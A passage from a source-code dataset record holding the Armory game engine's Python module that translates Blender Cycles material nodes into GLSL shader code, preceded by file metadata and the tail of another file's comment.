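#             segment_length='PT30S',  # ISO8601; 30 s to 5 min in 30-second steps
#         ),
#     )
#
# Required properties are read with kwargs['...'] in __init__, so omitting one
# (e.g. VideoSink's 'video_name') raises KeyError at construction time,
# mirroring each class's _validation map.
# ---------------------------------------------------------------------------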
38.473447
815
0.658563
152,726
0.994401
0
0
0
0
0
0
106,388
0.692693
4c4fedd0e6fc912cf1a282846b6e90c655a094c7
69,123
py
Python
blender/arm/material/cycles.py
philipmduarte/armory
675211c66a1e49147226ccb472a6f5dc87b7db02
[ "Zlib" ]
1
2021-03-17T05:51:45.000Z
2021-03-17T05:51:45.000Z
blender/arm/material/cycles.py
philipmduarte/armory
675211c66a1e49147226ccb472a6f5dc87b7db02
[ "Zlib" ]
null
null
null
blender/arm/material/cycles.py
philipmduarte/armory
675211c66a1e49147226ccb472a6f5dc87b7db02
[ "Zlib" ]
null
null
null
#
# This module builds upon Cycles nodes work licensed as
# Copyright 2011-2013 Blender Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import math
import bpy
import os
import arm.assets
import arm.utils
import arm.make_state
import arm.log
import arm.material.mat_state as mat_state
import arm.material.cycles_functions as c_functions
import shutil

emission_found = False
particle_info = None  # Particle info export


def parse(nodes, con, vert, frag, geom, tesc, tese, parse_surface=True, parse_opacity=True, parse_displacement=True, basecol_only=False):
    output_node = node_by_type(nodes, 'OUTPUT_MATERIAL')
    if output_node is not None:
        parse_output(output_node, con, vert, frag, geom, tesc, tese, parse_surface, parse_opacity, parse_displacement, basecol_only)


def parse_output(node, _con, _vert, _frag, _geom, _tesc, _tese, _parse_surface, _parse_opacity, _parse_displacement, _basecol_only):
    global parsed  # Compute nodes only once
    global parents
    global normal_parsed
    global curshader  # Active shader - frag for surface / tese for displacement
    global con
    global vert
    global frag
    global geom
    global tesc
    global tese
    global parse_surface
    global parse_opacity
    global basecol_only
    global emission_found
    global particle_info
    global sample_bump
    global sample_bump_res
    con = _con
    vert = _vert
    frag = _frag
    geom = _geom
    tesc = _tesc
    tese = _tese
    parse_surface = _parse_surface
    parse_opacity = _parse_opacity
    basecol_only = _basecol_only
    emission_found = False
    # Track which particle attributes the parsed node tree actually reads
    particle_info = {
        'index': False,
        'age': False,
        'lifetime': False,
        'location': False,
        'size': False,
        'velocity': False,
        'angular_velocity': False,
    }
    sample_bump = False
    sample_bump_res = ''
    wrd = bpy.data.worlds['Arm']

    # Surface
    if parse_surface or parse_opacity:
        parsed = {}
        parents = []
        normal_parsed = False
        curshader = frag

        out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission = parse_shader_input(node.inputs[0])
        if parse_surface:
            frag.write('basecol = {0};'.format(out_basecol))
            frag.write('roughness = {0};'.format(out_roughness))
            frag.write('metallic = {0};'.format(out_metallic))
            frag.write('occlusion = {0};'.format(out_occlusion))
            frag.write('specular = {0};'.format(out_specular))
            if '_Emission' in wrd.world_defs:
                frag.write('emission = {0};'.format(out_emission))
        if parse_opacity:
            frag.write('opacity = {0} - 0.0002;'.format(out_opacity))

    # Volume
    # parse_volume_input(node.inputs[1])

    # Displacement
    if _parse_displacement and disp_enabled() and node.inputs[2].is_linked:
        parsed = {}
        parents = []
        normal_parsed = False
        rpdat = arm.utils.get_rp()
        if rpdat.arm_rp_displacement == 'Tessellation' and tese is not None:
            curshader = tese
        else:
            curshader = vert
        out_disp = parse_displacement_input(node.inputs[2])
        curshader.write('vec3 disp = {0};'.format(out_disp))


def parse_group(node, socket):  # Entering group
    index = socket_index(node, socket)
    output_node = node_by_type(node.node_tree.nodes, 'GROUP_OUTPUT')
    if output_node is None:
        return
inp = output_node.inputs[index] parents.append(node) out_group = parse_input(inp) parents.pop() return out_group def parse_group_input(node, socket): index = socket_index(node, socket) parent = parents.pop() # Leaving group inp = parent.inputs[index] res = parse_input(inp) parents.append(parent) # Return to group return res def parse_input(inp): if inp.type == 'SHADER': return parse_shader_input(inp) elif inp.type == 'RGB': return parse_vector_input(inp) elif inp.type == 'RGBA': return parse_vector_input(inp) elif inp.type == 'VECTOR': return parse_vector_input(inp) elif inp.type == 'VALUE': return parse_value_input(inp) def parse_shader_input(inp): if inp.is_linked: l = inp.links[0] if l.from_node.type == 'REROUTE': return parse_shader_input(l.from_node.inputs[0]) return parse_shader(l.from_node, l.from_socket) else: out_basecol = 'vec3(0.8)' out_roughness = '0.0' out_metallic = '0.0' out_occlusion = '1.0' out_specular = '1.0' out_opacity = '1.0' out_emission = '0.0' return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission def parse_shader(node, socket): global emission_found out_basecol = 'vec3(0.8)' out_roughness = '0.0' out_metallic = '0.0' out_occlusion = '1.0' out_specular = '1.0' out_opacity = '1.0' out_emission = '0.0' if node.type == 'GROUP': if node.node_tree.name.startswith('Armory PBR'): if parse_surface: # Base color out_basecol = parse_vector_input(node.inputs[0]) # Occlusion out_occlusion = parse_value_input(node.inputs[2]) # Roughness out_roughness = parse_value_input(node.inputs[3]) # Metallic out_metallic = parse_value_input(node.inputs[4]) # Normal if node.inputs[5].is_linked and node.inputs[5].links[0].from_node.type == 'NORMAL_MAP': warn(mat_name() + ' - Do not use Normal Map node with Armory PBR, connect Image Texture directly') parse_normal_map_color_input(node.inputs[5]) # Emission if node.inputs[6].is_linked or node.inputs[6].default_value != 0.0: out_emission = parse_value_input(node.inputs[6]) emission_found = True if parse_opacity: out_opacity = parse_value_input(node.inputs[1]) else: return parse_group(node, socket) elif node.type == 'GROUP_INPUT': return parse_group_input(node, socket) elif node.type == 'MIX_SHADER': prefix = '' if node.inputs[0].is_linked else 'const ' fac = parse_value_input(node.inputs[0]) fac_var = node_name(node.name) + '_fac' fac_inv_var = node_name(node.name) + '_fac_inv' curshader.write('{0}float {1} = {2};'.format(prefix, fac_var, fac)) curshader.write('{0}float {1} = 1.0 - {2};'.format(prefix, fac_inv_var, fac_var)) bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[1]) bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[2]) if parse_surface: out_basecol = '({0} * {3} + {1} * {2})'.format(bc1, bc2, fac_var, fac_inv_var) out_roughness = '({0} * {3} + {1} * {2})'.format(rough1, rough2, fac_var, fac_inv_var) out_metallic = '({0} * {3} + {1} * {2})'.format(met1, met2, fac_var, fac_inv_var) out_occlusion = '({0} * {3} + {1} * {2})'.format(occ1, occ2, fac_var, fac_inv_var) out_specular = '({0} * {3} + {1} * {2})'.format(spec1, spec2, fac_var, fac_inv_var) out_emission = '({0} * {3} + {1} * {2})'.format(emi1, emi2, fac_var, fac_inv_var) if parse_opacity: out_opacity = '({0} * {3} + {1} * {2})'.format(opac1, opac2, fac_var, fac_inv_var) elif node.type == 'ADD_SHADER': bc1, rough1, met1, occ1, spec1, opac1, emi1 = parse_shader_input(node.inputs[0]) bc2, rough2, met2, occ2, spec2, opac2, emi2 = parse_shader_input(node.inputs[1]) if parse_surface: 
out_basecol = '({0} + {1})'.format(bc1, bc2) out_roughness = '({0} * 0.5 + {1} * 0.5)'.format(rough1, rough2) out_metallic = '({0} * 0.5 + {1} * 0.5)'.format(met1, met2) out_occlusion = '({0} * 0.5 + {1} * 0.5)'.format(occ1, occ2) out_specular = '({0} * 0.5 + {1} * 0.5)'.format(spec1, spec2) out_emission = '({0} * 0.5 + {1} * 0.5)'.format(emi1, emi2) if parse_opacity: out_opacity = '({0} * 0.5 + {1} * 0.5)'.format(opac1, opac2) elif node.type == 'BSDF_PRINCIPLED': if parse_surface: write_normal(node.inputs[19]) out_basecol = parse_vector_input(node.inputs[0]) # subsurface = parse_vector_input(node.inputs[1]) # subsurface_radius = parse_vector_input(node.inputs[2]) # subsurface_color = parse_vector_input(node.inputs[3]) out_metallic = parse_value_input(node.inputs[4]) out_specular = parse_value_input(node.inputs[5]) # specular_tint = parse_vector_input(node.inputs[6]) out_roughness = parse_value_input(node.inputs[7]) # aniso = parse_vector_input(node.inputs[8]) # aniso_rot = parse_vector_input(node.inputs[9]) # sheen = parse_vector_input(node.inputs[10]) # sheen_tint = parse_vector_input(node.inputs[11]) # clearcoat = parse_vector_input(node.inputs[12]) # clearcoat_rough = parse_vector_input(node.inputs[13]) # ior = parse_vector_input(node.inputs[14]) # transmission = parse_vector_input(node.inputs[15]) # transmission_roughness = parse_vector_input(node.inputs[16]) if node.inputs[17].is_linked or node.inputs[17].default_value[0] != 0.0: out_emission = '({0}.x)'.format(parse_vector_input(node.inputs[17])) emission_found = True # clearcoar_normal = parse_vector_input(node.inputs[20]) # tangent = parse_vector_input(node.inputs[21]) if parse_opacity: if len(node.inputs) > 20: out_opacity = parse_value_input(node.inputs[18]) elif node.type == 'BSDF_DIFFUSE': if parse_surface: write_normal(node.inputs[2]) out_basecol = parse_vector_input(node.inputs[0]) out_roughness = parse_value_input(node.inputs[1]) out_specular = '0.0' elif node.type == 'BSDF_GLOSSY': if parse_surface: write_normal(node.inputs[2]) out_basecol = parse_vector_input(node.inputs[0]) out_roughness = parse_value_input(node.inputs[1]) out_metallic = '1.0' elif node.type == 'AMBIENT_OCCLUSION': if parse_surface: # Single channel out_occlusion = parse_vector_input(node.inputs[0]) + '.r' elif node.type == 'BSDF_ANISOTROPIC': if parse_surface: write_normal(node.inputs[4]) # Revert to glossy out_basecol = parse_vector_input(node.inputs[0]) out_roughness = parse_value_input(node.inputs[1]) out_metallic = '1.0' elif node.type == 'EMISSION': if parse_surface: # Multiply basecol out_basecol = parse_vector_input(node.inputs[0]) out_emission = '1.0' emission_found = True emission_strength = parse_value_input(node.inputs[1]) out_basecol = '({0} * {1})'.format(out_basecol, emission_strength) elif node.type == 'BSDF_GLASS': if parse_surface: write_normal(node.inputs[3]) out_roughness = parse_value_input(node.inputs[1]) if parse_opacity: out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0])) elif node.type == 'BSDF_HAIR': pass elif node.type == 'HOLDOUT': if parse_surface: # Occlude out_occlusion = '0.0' elif node.type == 'BSDF_REFRACTION': # write_normal(node.inputs[3]) pass elif node.type == 'SUBSURFACE_SCATTERING': if parse_surface: write_normal(node.inputs[4]) out_basecol = parse_vector_input(node.inputs[0]) elif node.type == 'BSDF_TOON': # write_normal(node.inputs[3]) pass elif node.type == 'BSDF_TRANSLUCENT': if parse_surface: write_normal(node.inputs[1]) if parse_opacity: out_opacity = '(1.0 - 
{0}.r)'.format(parse_vector_input(node.inputs[0])) elif node.type == 'BSDF_TRANSPARENT': if parse_opacity: out_opacity = '(1.0 - {0}.r)'.format(parse_vector_input(node.inputs[0])) elif node.type == 'BSDF_VELVET': if parse_surface: write_normal(node.inputs[2]) out_basecol = parse_vector_input(node.inputs[0]) out_roughness = '1.0' out_metallic = '1.0' elif node.type == 'VOLUME_ABSORPTION': pass elif node.type == 'VOLUME_SCATTER': pass return out_basecol, out_roughness, out_metallic, out_occlusion, out_specular, out_opacity, out_emission def parse_displacement_input(inp): if inp.is_linked: l = inp.links[0] if l.from_node.type == 'REROUTE': return parse_displacement_input(l.from_node.inputs[0]) return parse_vector_input(inp) else: return None def parse_vector_input(inp): if inp.is_linked: l = inp.links[0] if l.from_node.type == 'REROUTE': return parse_vector_input(l.from_node.inputs[0]) res_var = write_result(l) st = l.from_socket.type if st == 'RGB' or st == 'RGBA' or st == 'VECTOR': return res_var else: # VALUE return 'vec3({0})'.format(res_var) else: if inp.type == 'VALUE': # Unlinked reroute return to_vec3([0.0, 0.0, 0.0]) else: if mat_batch() and inp.is_uniform: return to_uniform(inp) else: return to_vec3(inp.default_value) def parse_vector(node, socket): global particle_info global sample_bump global sample_bump_res # RGB if node.type == 'GROUP': return parse_group(node, socket) elif node.type == 'GROUP_INPUT': return parse_group_input(node, socket) elif node.type == 'VERTEX_COLOR': con.add_elem('col', 'short4norm') # Vcols only for now return 'vcolor' elif node.type == 'ATTRIBUTE': if socket == node.outputs[0]: # Color con.add_elem('col', 'short4norm') # Vcols only for now return 'vcolor' else: # Vector con.add_elem('tex', 'short2norm') # UVMaps only for now mat = mat_get_material() mat_users = mat_get_material_users() if mat_users != None and mat in mat_users: mat_user = mat_users[mat][0] if hasattr(mat_user.data, 'uv_layers'): # No uvlayers for Curve lays = mat_user.data.uv_layers # Second uvmap referenced if len(lays) > 1 and node.attribute_name == lays[1].name: con.add_elem('tex1', 'short2norm') return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)' return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)' elif node.type == 'RGB': if node.arm_material_param: nn = 'param_' + node_name(node.name) curshader.add_uniform('vec3 {0}'.format(nn), link='{0}'.format(node.name)) return nn else: return to_vec3(socket.default_value) elif node.type == 'TEX_BRICK': curshader.add_function(c_functions.str_tex_brick) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' col1 = parse_vector_input(node.inputs[1]) col2 = parse_vector_input(node.inputs[2]) col3 = parse_vector_input(node.inputs[3]) scale = parse_value_input(node.inputs[4]) res = 'tex_brick({0} * {4}, {1}, {2}, {3})'.format(co, col1, col2, col3, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_CHECKER': curshader.add_function(c_functions.str_tex_checker) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' col1 = parse_vector_input(node.inputs[1]) col2 = parse_vector_input(node.inputs[2]) scale = parse_value_input(node.inputs[3]) res = 'tex_checker({0}, {1}, {2}, {3})'.format(co, col1, col2, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_ENVIRONMENT': # Pass through return to_vec3([0.0, 0.0, 0.0]) elif node.type == 'TEX_GRADIENT': if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 
'bposition' grad = node.gradient_type if grad == 'LINEAR': f = '{0}.x'.format(co) elif grad == 'QUADRATIC': f = '0.0' elif grad == 'EASING': f = '0.0' elif grad == 'DIAGONAL': f = '({0}.x + {0}.y) * 0.5'.format(co) elif grad == 'RADIAL': f = 'atan({0}.y, {0}.x) / PI2 + 0.5'.format(co) elif grad == 'QUADRATIC_SPHERE': f = '0.0' elif grad == 'SPHERICAL': f = 'max(1.0 - sqrt({0}.x * {0}.x + {0}.y * {0}.y + {0}.z * {0}.z), 0.0)'.format(co) res = 'vec3(clamp({0}, 0.0, 1.0))'.format(f) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_IMAGE': # Already fetched if is_parsed(store_var_name(node)): return '{0}.rgb'.format(store_var_name(node)) tex_name = node_name(node.name) tex = make_texture(node, tex_name) tex_link = node.name if node.arm_material_param else None if tex != None: curshader.write_textures += 1 to_linear = node.image != None and node.image.colorspace_settings.name == 'sRGB' res = '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear, tex_link=tex_link)) curshader.write_textures -= 1 return res elif node.image == None: # Empty texture tex = {} tex['name'] = tex_name tex['file'] = '' return '{0}.rgb'.format(texture_store(node, tex, tex_name, to_linear=False, tex_link=tex_link)) else: global parsed tex_store = store_var_name(node) # Pink color for missing texture parsed[tex_store] = True curshader.write_textures += 1 curshader.write('vec4 {0} = vec4(1.0, 0.0, 1.0, 1.0);'.format(tex_store)) curshader.write_textures -= 1 return '{0}.rgb'.format(tex_store) elif node.type == 'TEX_MAGIC': curshader.add_function(c_functions.str_tex_magic) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) res = 'tex_magic({0} * {1} * 4.0)'.format(co, scale) if sample_bump: write_bump(node, res, 0.1) return res elif node.type == 'TEX_MUSGRAVE': curshader.add_function(c_functions.str_tex_musgrave) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) # detail = parse_value_input(node.inputs[2]) # distortion = parse_value_input(node.inputs[3]) res = 'vec3(tex_musgrave_f({0} * {1} * 0.5))'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_NOISE': curshader.add_function(c_functions.str_tex_noise) assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png') assets_add_embedded_data('noise256.png') curshader.add_uniform('sampler2D snoise256', link='$noise256.png') curshader.add_function(c_functions.str_tex_noise) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) # detail = parse_value_input(node.inputs[2]) # distortion = parse_value_input(node.inputs[3]) # Slow.. 
res = 'vec3(tex_noise({0} * {1}), tex_noise({0} * {1} + 0.33), tex_noise({0} * {1} + 0.66))'.format(co, scale) if sample_bump: write_bump(node, res, 0.1) return res elif node.type == 'TEX_POINTDENSITY': # Pass through return to_vec3([0.0, 0.0, 0.0]) elif node.type == 'TEX_SKY': # Pass through return to_vec3([0.0, 0.0, 0.0]) elif node.type == 'TEX_VORONOI': curshader.add_function(c_functions.str_tex_voronoi) assets_add(get_sdk_path() + '/armory/Assets/' + 'noise256.png') assets_add_embedded_data('noise256.png') curshader.add_uniform('sampler2D snoise256', link='$noise256.png') if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) if node.coloring == 'INTENSITY': res = 'vec3(tex_voronoi({0} * {1}).a)'.format(co, scale) else: # CELLS res = 'tex_voronoi({0} * {1}).rgb'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'TEX_WAVE': curshader.add_function(c_functions.str_tex_wave) if node.inputs[0].is_linked: co = parse_vector_input(node.inputs[0]) else: co = 'bposition' scale = parse_value_input(node.inputs[1]) res = 'vec3(tex_wave_f({0} * {1}))'.format(co, scale) if sample_bump: write_bump(node, res) return res elif node.type == 'BRIGHTCONTRAST': out_col = parse_vector_input(node.inputs[0]) bright = parse_value_input(node.inputs[1]) contr = parse_value_input(node.inputs[2]) curshader.add_function(c_functions.str_brightcontrast) return 'brightcontrast({0}, {1}, {2})'.format(out_col, bright, contr) elif node.type == 'GAMMA': out_col = parse_vector_input(node.inputs[0]) gamma = parse_value_input(node.inputs[1]) return 'pow({0}, vec3({1}))'.format(out_col, gamma) elif node.type == 'HUE_SAT': curshader.add_function(c_functions.str_hue_sat) hue = parse_value_input(node.inputs[0]) sat = parse_value_input(node.inputs[1]) val = parse_value_input(node.inputs[2]) fac = parse_value_input(node.inputs[3]) col = parse_vector_input(node.inputs[4]) return 'hue_sat({0}, vec4({1}-0.5, {2}, {3}, 1.0-{4}))'.format(col, hue, sat, val, fac) elif node.type == 'INVERT': fac = parse_value_input(node.inputs[0]) out_col = parse_vector_input(node.inputs[1]) return 'mix({0}, vec3(1.0) - ({0}), {1})'.format(out_col, fac) elif node.type == 'MIX_RGB': fac = parse_value_input(node.inputs[0]) fac_var = node_name(node.name) + '_fac' curshader.write('float {0} = {1};'.format(fac_var, fac)) col1 = parse_vector_input(node.inputs[1]) col2 = parse_vector_input(node.inputs[2]) blend = node.blend_type if blend == 'MIX': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) elif blend == 'ADD': out_col = 'mix({0}, {0} + {1}, {2})'.format(col1, col2, fac_var) elif blend == 'MULTIPLY': out_col = 'mix({0}, {0} * {1}, {2})'.format(col1, col2, fac_var) elif blend == 'SUBTRACT': out_col = 'mix({0}, {0} - {1}, {2})'.format(col1, col2, fac_var) elif blend == 'SCREEN': out_col = '(vec3(1.0) - (vec3(1.0 - {2}) + {2} * (vec3(1.0) - {1})) * (vec3(1.0) - {0}))'.format(col1, col2, fac_var) elif blend == 'DIVIDE': out_col = '(vec3((1.0 - {2}) * {0} + {2} * {0} / {1}))'.format(col1, col2, fac_var) elif blend == 'DIFFERENCE': out_col = 'mix({0}, abs({0} - {1}), {2})'.format(col1, col2, fac_var) elif blend == 'DARKEN': out_col = 'min({0}, {1} * {2})'.format(col1, col2, fac_var) elif blend == 'LIGHTEN': out_col = 'max({0}, {1} * {2})'.format(col1, col2, fac_var) elif blend == 'OVERLAY': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix elif blend == 'DODGE': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, 
fac_var) # Revert to mix elif blend == 'BURN': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix elif blend == 'HUE': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix elif blend == 'SATURATION': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix elif blend == 'VALUE': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix elif blend == 'COLOR': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix elif blend == 'SOFT_LIGHT': out_col = '((1.0 - {2}) * {0} + {2} * ((vec3(1.0) - {0}) * {1} * {0} + {0} * (vec3(1.0) - (vec3(1.0) - {1}) * (vec3(1.0) - {0}))));'.format(col1, col2, fac) elif blend == 'LINEAR_LIGHT': out_col = 'mix({0}, {1}, {2})'.format(col1, col2, fac_var) # Revert to mix # out_col = '({0} + {2} * (2.0 * ({1} - vec3(0.5))))'.format(col1, col2, fac_var) if node.use_clamp: return 'clamp({0}, vec3(0.0), vec3(1.0))'.format(out_col) else: return out_col elif node.type == 'BLACKBODY': t = float(parse_value_input(node.inputs[0])) rgb = [0,0,0] blackbody_table_r = [ [2.52432244e+03, -1.06185848e-03, 3.11067539e+00], [3.37763626e+03, -4.34581697e-04, 1.64843306e+00], [4.10671449e+03, -8.61949938e-05, 6.41423749e-01], [4.66849800e+03, 2.85655028e-05, 1.29075375e-01], [4.60124770e+03, 2.89727618e-05, 1.48001316e-01], [3.78765709e+03, 9.36026367e-06, 3.98995841e-01] ] blackbody_table_g = [ [-7.50343014e+02, 3.15679613e-04, 4.73464526e-01], [-1.00402363e+03, 1.29189794e-04, 9.08181524e-01], [-1.22075471e+03, 2.56245413e-05, 1.20753416e+00], [-1.42546105e+03, -4.01730887e-05, 1.44002695e+00], [-1.18134453e+03, -2.18913373e-05, 1.30656109e+00], [-5.00279505e+02, -4.59745390e-06, 1.09090465e+00] ] blackbody_table_b = [ [0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0], [-2.02524603e-11, 1.79435860e-07, -2.60561875e-04, -1.41761141e-02], [-2.22463426e-13, -1.55078698e-08, 3.81675160e-04, -7.30646033e-01], [6.72595954e-13, -2.73059993e-08, 4.24068546e-04, -7.52204323e-01] ] if (t >= 12000): rgb[0] = 0.826270103 rgb[1] = 0.994478524 rgb[2] = 1.56626022 elif (t < 965.0): rgb[0] = 4.70366907 rgb[1] = 0.0 rgb[2] = 0.0 else: if (t >= 6365.0): i = 5 elif(t >= 3315.0): i = 4 elif(t >= 1902.0): i = 3 elif(t >= 1449.0): i = 2 elif(t >= 1167.0): i = 1 else: i = 0 r = blackbody_table_r[i] g = blackbody_table_g[i] b = blackbody_table_b[i] t_inv = 1.0 / t rgb[0] = r[0] * t_inv + r[1] * t + r[2] rgb[1] = g[0] * t_inv + g[1] * t + g[2] rgb[2] = ((b[0] * t + b[1]) * t + b[2]) * t + b[3] # Pass constant return to_vec3([rgb[0], rgb[1], rgb[2]]) elif node.type == 'VALTORGB': # ColorRamp fac = parse_value_input(node.inputs[0]) interp = node.color_ramp.interpolation elems = node.color_ramp.elements if len(elems) == 1: return to_vec3(elems[0].color) # Write cols array cols_var = node_name(node.name) + '_cols' curshader.write('vec3 {0}[{1}];'.format(cols_var, len(elems))) # TODO: Make const for i in range(0, len(elems)): curshader.write('{0}[{1}] = vec3({2}, {3}, {4});'.format(cols_var, i, elems[i].color[0], elems[i].color[1], elems[i].color[2])) # Get index fac_var = node_name(node.name) + '_fac' curshader.write('float {0} = {1};'.format(fac_var, fac)) index = '0' for i in range(1, len(elems)): index += ' + ({0} > {1} ? 
1 : 0)'.format(fac_var, elems[i].position) # Write index index_var = node_name(node.name) + '_i' curshader.write('int {0} = {1};'.format(index_var, index)) if interp == 'CONSTANT': return '{0}[{1}]'.format(cols_var, index_var) else: # Linear # Write facs array facs_var = node_name(node.name) + '_facs' curshader.write('float {0}[{1}];'.format(facs_var, len(elems))) # TODO: Make const for i in range(0, len(elems)): curshader.write('{0}[{1}] = {2};'.format(facs_var, i, elems[i].position)) # Mix color # float f = (pos - start) * (1.0 / (finish - start)) return 'mix({0}[{1}], {0}[{1} + 1], ({2} - {3}[{1}]) * (1.0 / ({3}[{1} + 1] - {3}[{1}]) ))'.format(cols_var, index_var, fac_var, facs_var) elif node.type == 'CURVE_VEC': # Vector Curves fac = parse_value_input(node.inputs[0]) vec = parse_vector_input(node.inputs[1]) curves = node.mapping.curves name = node_name(node.name) # mapping.curves[0].points[0].handle_type # bezier curve return '(vec3({0}, {1}, {2}) * {3})'.format(\ vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac) elif node.type == 'CURVE_RGB': # RGB Curves fac = parse_value_input(node.inputs[0]) vec = parse_vector_input(node.inputs[1]) curves = node.mapping.curves name = node_name(node.name) # mapping.curves[0].points[0].handle_type return '(sqrt(vec3({0}, {1}, {2}) * vec3({4}, {5}, {6})) * {3})'.format(\ vector_curve(name + '0', vec + '.x', curves[0].points), vector_curve(name + '1', vec + '.y', curves[1].points), vector_curve(name + '2', vec + '.z', curves[2].points), fac,\ vector_curve(name + '3a', vec + '.x', curves[3].points), vector_curve(name + '3b', vec + '.y', curves[3].points), vector_curve(name + '3c', vec + '.z', curves[3].points)) elif node.type == 'COMBHSV': curshader.add_function(c_functions.str_hue_sat) h = parse_value_input(node.inputs[0]) s = parse_value_input(node.inputs[1]) v = parse_value_input(node.inputs[2]) return 'hsv_to_rgb(vec3({0}, {1}, {2}))'.format(h,s,v) elif node.type == 'COMBRGB': r = parse_value_input(node.inputs[0]) g = parse_value_input(node.inputs[1]) b = parse_value_input(node.inputs[2]) return 'vec3({0}, {1}, {2})'.format(r, g, b) elif node.type == 'WAVELENGTH': curshader.add_function(c_functions.str_wavelength_to_rgb) wl = parse_value_input(node.inputs[0]) # Roughly map to cycles - 450 to 600 nanometers return 'wavelength_to_rgb(({0} - 450.0) / 150.0)'.format(wl) # Vector elif node.type == 'CAMERA': # View Vector in camera space return 'vVecCam' elif node.type == 'NEW_GEOMETRY': if socket == node.outputs[0]: # Position return 'wposition' elif socket == node.outputs[1]: # Normal return 'n' if curshader.shader_type == 'frag' else 'wnormal' elif socket == node.outputs[2]: # Tangent return 'wtangent' elif socket == node.outputs[3]: # True Normal return 'n' if curshader.shader_type == 'frag' else 'wnormal' elif socket == node.outputs[4]: # Incoming return 'vVec' elif socket == node.outputs[5]: # Parametric return 'mposition' elif node.type == 'HAIR_INFO': return 'vec3(0.0)' # Tangent Normal elif node.type == 'OBJECT_INFO': return 'wposition' elif node.type == 'PARTICLE_INFO': if socket == node.outputs[3]: # Location particle_info['location'] = True return 'p_location' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)' elif socket == node.outputs[5]: # Velocity particle_info['velocity'] = True return 'p_velocity' if arm.utils.get_rp().arm_particles == 'On' else 'vec3(0.0)' elif socket == node.outputs[6]: # Angular 
Velocity particle_info['angular_velocity'] = True return 'vec3(0.0)' elif node.type == 'TANGENT': return 'wtangent' elif node.type == 'TEX_COORD': #obj = node.object #instance = node.from_instance if socket == node.outputs[0]: # Generated - bounds return 'bposition' elif socket == node.outputs[1]: # Normal return 'n' elif socket == node.outputs[2]: # UV con.add_elem('tex', 'short2norm') return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)' elif socket == node.outputs[3]: # Object return 'mposition' elif socket == node.outputs[4]: # Camera return 'vec3(0.0)' # 'vposition' elif socket == node.outputs[5]: # Window return 'vec3(0.0)' # 'wvpposition' elif socket == node.outputs[6]: # Reflection return 'vec3(0.0)' elif node.type == 'UVMAP': #instance = node.from_instance con.add_elem('tex', 'short2norm') mat = mat_get_material() mat_users = mat_get_material_users() if mat_users != None and mat in mat_users: mat_user = mat_users[mat][0] if hasattr(mat_user.data, 'uv_layers'): lays = mat_user.data.uv_layers # Second uvmap referenced if len(lays) > 1 and node.uv_map == lays[1].name: con.add_elem('tex1', 'short2norm') return 'vec3(texCoord1.x, 1.0 - texCoord1.y, 0.0)' return 'vec3(texCoord.x, 1.0 - texCoord.y, 0.0)' elif node.type == 'BUMP': # Interpolation strength strength = parse_value_input(node.inputs[0]) # Height multiplier # distance = parse_value_input(node.inputs[1]) sample_bump = True height = parse_value_input(node.inputs[2]) sample_bump = False nor = parse_vector_input(node.inputs[3]) if sample_bump_res != '': if node.invert: ext = ['1', '2', '3', '4'] else: ext = ['2', '1', '4', '3'] curshader.write('float {0}_fh1 = {0}_{1} - {0}_{2}; float {0}_fh2 = {0}_{3} - {0}_{4};'.format(sample_bump_res, ext[0], ext[1], ext[2], ext[3])) curshader.write('{0}_fh1 *= ({1}) * 3.0; {0}_fh2 *= ({1}) * 3.0;'.format(sample_bump_res, strength)) curshader.write('vec3 {0}_a = normalize(vec3(2.0, 0.0, {0}_fh1));'.format(sample_bump_res)) curshader.write('vec3 {0}_b = normalize(vec3(0.0, 2.0, {0}_fh2));'.format(sample_bump_res)) res = 'normalize(mat3({0}_a, {0}_b, normalize(vec3({0}_fh1, {0}_fh2, 2.0))) * n)'.format(sample_bump_res) 